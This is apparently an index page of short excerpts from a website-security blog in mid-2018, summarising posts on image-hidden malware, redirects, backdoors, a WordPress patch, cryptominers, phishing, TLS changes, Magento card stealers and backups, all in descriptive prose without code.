- Hiding Malware Inside Images on GoogleUserContent 18 July 2018
If you have been following our blog for a long time, you might remember us writing about malware that used EXIF data to hide its code.
This technique is still in use. Let us show you a recent example.
This code was found at the beginning of a malicious script that steals PayPal security tokens.
As you can see, it reads “EXIF data” from a pacman.jpg image hosted on Google’s servers, probably uploaded using a Blogger or Google+ account.
- Persistent Malicious Redirect Variants 16 July 2018
It’s always nice to meet an old friend or someone you used to know well. You have news to share and talk about, stories to tell, etc. But what if your “old friend” was on the criminal side of things and you are meeting him more often than you actually like? Moreover, when you see him, he keeps changing his appearance with different sunglasses, haircuts, beards, and mustaches. But you know it’s still him. And you know he’s still a criminal…
This exactly describes the case of a family of malicious injectors and redirects we have been seeing for several years.
- Ask Sucuri: How Do You Find Website Backdoors? 11 July 2018
In a previous post, we have explained what website backdoors are and what they look like. Today, we want to focus on ways that we identify and remove backdoors to prevent reinfection.
Techniques to Find Backdoors
Finding a website backdoor is not an easy task because the main function of a backdoor is to keep it hidden from the website owner. However, at Sucuri we recommend the following techniques:
We know what good files look like.
- WordPress Update – 4.9.7 Security & Maintenance Release 5 July 2018
The WordPress team has just released a critical security and maintenance update to resolve a number of bugs and security issues.
Included in this release is a patch that protects against a vulnerability allowing bad actors to delete files from your site. If certain circumstances are met, this vulnerability may be enough for an attacker to completely take control of your website.
Are You at Risk?
If you don’t have automatic updates enabled or are using WordPress version 4.9.6 or earlier, your site may be vulnerable to this security issue originally reported by Slavco.
- CoinImp Cryptominer and Fully Qualified Domain Names 5 July 2018
We are all familiar with the conventional domain name notation, where different levels are concatenated with the full stop character (period).
E.g. “www.example.com”, where “www” is a subdomain, “example” is a second level domain, and “com” is a top-level domain.
However, very few know that there is also a DNS root domain and it can be also specified in the fully qualified domain names.
- Google and Facebook Used in Phishing Campaigns 3 July 2018
We’ve all seen sketchy looking emails or texts with malicious links to click on. There are still people who fall for these more obvious types of scams, however, phishing scam messages are designed to be deceiving. They use methods that appear valid or of some urgent matter, encouraging its victim to hand over their data.
Phishing attempts happen in many ways, such as:
- deceptive email campaigns,
- suspicious SMS alerts (called smishing),
- fake websites designed to look and sound authentic, and more.
- Sucuri Enhances Security by Disabling TLS Version 1.0 and 1.1 29 June 2018
Protecting our users’ information and privacy is extremely important to us. As a cloud-based security service, we are fully committed to complying with the PCI Data Security Standards (PCI DSS) requirements. That is why Sucuri disabled support for TLS version 1.0 and 1.1 to our WAF/CDN edge nodes on June 28, 2018.
What Is TLS?
Transport Layer Security (TLS) is a cryptographic protocol used to enhance the security of a communication channel by encrypting the traffic between the parties involved.
- What are Website Backdoors? 26 June 2018
When a site gets compromised, the attackers will often leave some piece of malware behind to allow them access back to the site. Hackers want to leave a door open to retain control of the website and to reinfect it continuously. This type of malware is called a backdoor.
What Are Backdoors?
Backdoors are types of malware that allow for remote control of a compromised website by bypassing appropriate authentication methods.
- Why You Should Care about Website Security on Your Small Site 21 June 2018
Most people assume that if their website has been compromised, there must have been an attacker evaluating their site and looking for a specific vulnerability to hack.
Under most circumstances however, bad actors don’t manually hand-pick websites to attack since it’s a tedious and time consuming process. Instead, they rely on automation to identify vulnerable websites and execute their attacks. The unfortunate reality is that websites big or small are targeted daily and the majority of these attacks are automated.
- Magento Credit Card Stealer Reinfector 19 June 2018
In the past few months, we have frequently seen how attackers are infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials. That is why we have reported on a credit card stealer reinfector of Magento websites in one of our recent Labs Notes.
In this post, we describe one of the methods hackers use to ensure that their malicious code is added back to a website after it has been removed.
- The Importance of Website Backups 14 June 2018
Imagine waking up in the morning to see that a couple of calls were missed and your email is overloaded with messages saying that your website is down. You go to your computer to check your server and it’s working fine – but oh no, all your files are deleted from the database. What would you do?
Backing up everything may seem a boring task, however, website backups can be a life saver.